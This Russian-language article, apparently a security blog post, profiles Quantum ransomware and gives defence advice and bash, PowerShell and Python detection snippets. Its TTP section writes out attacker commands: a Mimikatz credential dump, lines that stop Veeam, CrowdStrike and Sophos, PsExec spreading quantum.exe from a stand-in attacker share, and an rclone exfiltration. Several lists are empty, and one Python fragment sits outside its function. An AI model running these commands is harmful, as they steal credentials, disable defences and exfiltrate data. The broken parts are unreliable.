
Автор: Дженнифер Уокер
Последнее обновление: Июнь 2024
Атаки вымогателей развиваются с пугающей скоростью, и Квантовый вымогатель устанавливает новый стандарт по скорости атаки и деструктивности. В отличие от обычных программ-вымогателей, квантовый вымогатель разработан для быстрого проникновения, полного захвата домена и полного шифрования данных — иногда менее чем за четыре часа. Организациям необходимо понимать срочность и уникальные технические особенности этого нового варианта вымогателя, чтобы укрепить свои среды и обеспечить возможность восстановления.
В этой глубокой статье мы исследуем квантовый вымогатель от начального доступа до полного шифрования домена, разберем его внутреннюю работу с практическими примерами обнаружения и реагирования, а также обсудим тактики обеспечения устойчивости и последствия пост-квантовой криптографии. Вы получите всесторонние знания — от начальных до продвинутых — о квантовом вымогателе, реальных примерах, фрагментах кода обнаружения и лучших практиках для киберустойчивости.
Квантовый вымогатель — это агрессивный вариант программ-вымогателей (вредоносного ПО, программное обеспечение, предназначенное для шифрования файлов и требования выкупа), который отличается скоростью и эффективностью при боковом распространении по сетям и шифровании данных. Исследования безопасности (см. отчет WaterISAC) задокументировали атаки с применением квантового вымогателя, которые достигли повсеместного шифрования домена менее чем за четыре часа после первоначального доступа — значительно быстрее, чем старые семейства вымогателей.
Считается, что квантовый вымогатель тесно связан с экосистемой вымогателей Conti (см. отчет DFIR и консультативные советы CERT), демонстрируя аналогичные тактики, методы и процедуры (TTP), но оптимизированные для максимальной скорости.
Название "Квантовый" вероятно связано с скоростью и "квантовым скачком" в операционной скорости, а не с настоящими квантовыми вычислениями (хотя появление квантовых компьютеров ставит новые угрозы для криптографии, о чем мы поговорим позже). В настоящее время «Квантовый» вымогатель следует понимать как сверхзаряженный вариант вымогателя, который вынуждает защитников реагировать в узкое окно времени.
Выдающийся инцидент квантового вымогателя, описанный WaterISAC и The DFIR Report (источник), продемонстрировал следующую тревожную хронологию:
Эта атака показывает скорость, с которой работают современные противники, и почему устаревшие механизмы обнаружения и реагирования часто не работают.
Давайте разберем типичную атаку квантового вымогателя на ее технические этапы, аналогичные тактикам MITRE ATT&CK.
Квантовый вымогатель обычно получает первоначальный доступ через:
Известная атака, описанная WaterISAC, началась с фишингового письма, нацеленного на привилегированную учетную запись, с использованием оружейного документа Office для доставки загрузочного вредоносного ПО, которое затем приносило полезную нагрузку квантового вымогателя.
После первоначального доступа атакующие быстро переходят к сбору учетных данных:
Цель здесь состоит в том, чтобы получить права администратора домена.
Злоумышленники используют украденные учетные данные для перехода через среду:
Акторы квантового вымогателя отключают защитные средства (антивирус, EDR, агенты резервного копирования), ищут хранилища резервных копий для удаления и подготавливают среду для массового шифрования.
Наконец, злоумышленники развертывают полезную нагрузку квантового вымогателя:
Дизайн Quantum сосредоточен на максимизации шифруемых конечных точек до того, как обнаружение/реагирование может эффективно вмешаться, делая критически важными быстрое обнаружение (минуты, а не часы) и ответ.
Давайте разберем черный ящик: как квантовый вымогатель работает внутри, и какие артефакты он оставляет?
| Тактика | Техника | Инструмент/команда |
|---|---|---|
| Начальный доступ | Фишинг/Эксплуатация | Вредоносные документы Office, CVE- |
| Повышение привилегий | Изъятие учетных данных | Mimikatz, дамп lsass.exe |
| Боковое перемещение | RDP, SMB, Cobalt Strike, PsExec | cobaltstrike, psexec.exe |
| Уклонение от защиты | Отключение антивируса/EDR, агенты резервного копирования | taskkill, sc.exe, net stop |
| Воздействие (вымогатель) | Массовое шифрование | quantum.exe, записки с выкупом |
| Изъятие | Ручной перенос файлов, rclone, MEGAsync | rclone, curl, sftp |
| Устойчивость | Регистрация служб, планировщик задач | schtasks, services.msc |
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'
taskkill /F /IM veeamagent.exe
sc stop CrowdStrike
net stop "Sophos Endpoint Defense"
psexec.exe @hosts.txt -u .\Administrator -p MyP@ssw0rd -h -d \\attacker\share\quantum.exe
rclone copy C:\SensitiveData remote:exfiltrated --transfers=64 --multi-thread-streams=8
Обнаружение квантового вымогателя может быть похоже на охоту за тенями, но защитники могут следить за этими явными признаками:
Bash: Список файлов, измененных за последние 60 минут (шифровщики часто перезаписывают временные метки файлов):
find /home -type f -mmin -60 2>/dev/null
Windows: Получите 100 недавно измененных файлов на диске C
Get-ChildItem -Recurse -Path C:\ |
Where-Object {!$_.PSIsContainer} |
Sort-Object LastWriteTime -Descending |
Select-Object -First 100 FullName, LastWriteTime
Пост-квантовая криптография (PQC) относится к алгоритмам, разработанным для обеспечения безопасности при возможностях квантовых компьютеров, способных взламывать классическую криптографию (например, RSA/ECC) с помощью алгоритма Шора и других.
Смотрите полное мнение Майкла об этих будущих угрозах (YouTube: Quantum Threats Are Coming).
Атака квантовым вымогателем — это гонка со временем. Подготовка и устойчивость — ваша лучшая надежда.
1. Укрепление начальных точек доступа
2. Ограничение привилегированного доступа
3. Мониторинг бокового перемещения
4. Сегрегация, защита и мониторинг резервных копий
5. Сегментация сети
6. Охота на угрозы и информирование пользователя
Согласно решениям для восстановления при атаках квантовых вымогателей и таким структурам, как NIST, быстрое и надежное восстановление имеет критическое значение:
Программы-вымогатели обычно модифицируют или заменяют большое количество файлов с высокой скоростью. Вы можете периодически сканировать это, чтобы обнаружить подозрительные массовые изменения:
find /home -type f -cmin -30 2>/dev/null | tee recent_changes.txt
# Проверьте, не изменилось ли подозрительно большое количество файлов за короткое время
NUM_CHANGED=$(wc -l < recent_changes.txt)
if [ "$NUM_CHANGED" -gt 1000 ]; then
echo "ПРЕДУПРЕЖДЕНИЕ: Изменено более $NUM_CHANGED файлов за последние 30 минут!"
# Опционно включите тревогу или изолируйте хост
fi
Вы можете использовать python-evtx для разбора журналов событий Windows, чтобы выявлять такие признаки, как:
import evtx
import re
def parse_evtx_for_psexec(evtx_file):
with evtx.Evtx(evtx_file) as log:
for record in log.records():
xml = record.xml()
# Простое регулярное выражение для изображения PsExec, уточните шаблон по мере необходимости
if re.search(r'[\\/]PsExec\.exe', xml, re.IGNORECASE):
print(f"Выполнение PsExec обнаружено в {record.timestamp()}:\n{xml}\n")
# Использование
parse_evtx_for_psexec("C:\\Windows\\System32\\winevt\\Logs\\Security.evtx")
if 'powershell' in xml and 'EncodedCommand' in xml:
print("Обнаружена возможно подозрительная активность PowerShell.")
Квантовый вымогатель быстрый; он позволяет заглянуть в будущий кибер "взрыв". Гонка идет между защитниками, проектирующими устойчивые, бездоверительные, хорошо сегментированные среды, и нападчиками, создающими всё более совершенные, автоматизированные и вымогательские инструменты.
Основные выводы:
Понимая инструменты, методы и скорость квантового вымогателя, вы будете лучше подготовлены, чтобы защитить самые критически важные цифровые активы вашей организации, быстро восстановиться, если случится худшее, и подготовить основу для устойчивости к грядущим угрозам.
Дженнифер Уокер
Автор и аналитик по вопросам кибербезопасности
Обновлено в Июне 2024
SEO Ключевые слова: квантовый вымогатель, устойчивость к вымогателям, восстановление от вымогателей, пост-квантовая криптография, киберустойчивость, обнаружение вымогателей, цепочка атаки вымогателей, кибербезопасность, предотвращение вымогателей, решения для восстановления от вымогателей, реальный пример нападения вымогателя, шкала времени атаки квантового вымогателя, обнаружение вымогателей в bash, анализ журналов вымогателей в Python, неизменяемые резервные копии, быстрая реакция на вымогателей.
(Этот пост минимизирует ненужную информацию и максимизирует полезные технические детали, как было запрошено.)
Если вы нашли этот контент ценным, представьте, чего вы могли бы достичь с нашей комплексной 47-недельной элитной обучающей программой. Присоединяйтесь к более чем 1200 студентам, которые изменили свою карьеру с помощью техник Подразделения 8200.